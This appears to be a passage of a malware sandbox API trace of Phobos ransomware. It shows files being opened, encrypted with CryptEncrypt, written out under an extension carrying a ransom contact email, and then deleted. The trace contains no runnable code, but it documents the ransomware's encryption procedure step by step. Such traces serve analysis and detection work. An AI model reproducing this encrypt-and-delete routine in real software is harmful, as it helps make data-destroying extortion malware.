halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.666] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.666] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.666] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.666] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0194.667] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ae8) returned 1 [0194.667] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.667] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x8000, lpOverlapped=0x0) returned 1 [0194.687] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x8010, dwBufLen=0x8010 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x8010) returned 1 [0194.687] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x8010, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x8010, lpOverlapped=0x0) returned 1 [0194.689] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0194.689] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.689] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0194.689] CryptDestroyKey (hKey=0xa32c68) returned 1 [0194.689] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0194.689] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.689] CloseHandle (hObject=0x134) returned 1 [0194.689] CloseHandle (hObject=0x14c) returned 1 [0194.689] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\index.dat")) returned 1 [0194.690] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0194.690] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0194.691] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=262144) returned 1 [0194.691] CloseHandle (hObject=0x14c) returned 1 [0194.691] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat")) returned 0x2026 [0194.691] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.691] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0194.691] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.691] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.691] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.692] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ae8) returned 1 [0194.692] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.692] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x40000, lpOverlapped=0x0) returned 1 [0194.694] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40010, dwBufLen=0x40010 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40010) returned 1 [0194.696] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x40010, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x40010, lpOverlapped=0x0) returned 1 [0194.701] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0194.701] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.701] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0194.701] CryptDestroyKey (hKey=0xa32c68) returned 1 [0194.702] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0194.702] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.702] CloseHandle (hObject=0x14c) returned 1 [0194.702] CloseHandle (hObject=0x134) returned 1 [0194.702] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat")) returned 1 [0194.704] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0194.704] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\ietldcache\\low\\index.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.705] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=262144) returned 1 [0194.705] CloseHandle (hObject=0x134) returned 1 [0194.705] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\ietldcache\\low\\index.dat")) returned 0x2026 [0194.705] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\ietldcache\\low\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.705] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\ietldcache\\low\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.705] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.706] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.706] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\ietldcache\\low\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0194.706] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ae8) returned 1 [0194.707] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.707] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x40000, lpOverlapped=0x0) returned 1 [0194.812] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40010, dwBufLen=0x40010 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40010) returned 1 [0194.814] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x40010, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x40010, lpOverlapped=0x0) returned 1 [0194.819] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0194.819] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.820] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0194.820] CryptDestroyKey (hKey=0xa32d28) returned 1 [0194.820] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0194.820] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.820] CloseHandle (hObject=0x134) returned 1 [0194.820] CloseHandle (hObject=0x14c) returned 1 [0194.820] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\ietldcache\\low\\index.dat")) returned 1 [0194.822] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0194.822] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0194.823] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=174) returned 1 [0194.823] CloseHandle (hObject=0x14c) returned 1 [0194.823] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\desktop.ini")) returned 0x6 [0194.823] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.823] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0194.823] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.823] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.823] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.824] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ae8) returned 1 [0194.824] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.824] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xae, lpOverlapped=0x0) returned 1 [0194.825] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0, dwBufLen=0xb0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0) returned 1 [0194.825] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xb0, lpOverlapped=0x0) returned 1 [0194.825] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0194.825] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.825] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0194.825] CryptDestroyKey (hKey=0xa32d28) returned 1 [0194.825] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0194.826] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.826] CloseHandle (hObject=0x14c) returned 1 [0194.826] CloseHandle (hObject=0x134) returned 1 [0194.826] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\desktop.ini")) returned 1 [0194.827] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0194.827] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.827] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=704) returned 1 [0194.827] CloseHandle (hObject=0x134) returned 1 [0194.827] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\desktop.ini")) returned 0x26 [0194.828] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.828] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.828] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.828] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.828] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0194.829] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ae8) returned 1 [0194.829] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.829] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x2c0, lpOverlapped=0x0) returned 1 [0194.829] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2d0, dwBufLen=0x2d0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2d0) returned 1 [0194.829] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2d0, lpOverlapped=0x0) returned 1 [0194.830] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0194.830] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.830] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0194.830] CryptDestroyKey (hKey=0xa32d28) returned 1 [0194.830] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0194.830] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.830] CloseHandle (hObject=0x134) returned 1 [0194.830] CloseHandle (hObject=0x14c) returned 1 [0194.831] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\desktop.ini")) returned 1 [0194.832] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0194.832] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0194.832] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=678) returned 1 [0194.832] CloseHandle (hObject=0x14c) returned 1 [0194.832] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\desktop.ini")) returned 0x26 [0194.832] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js 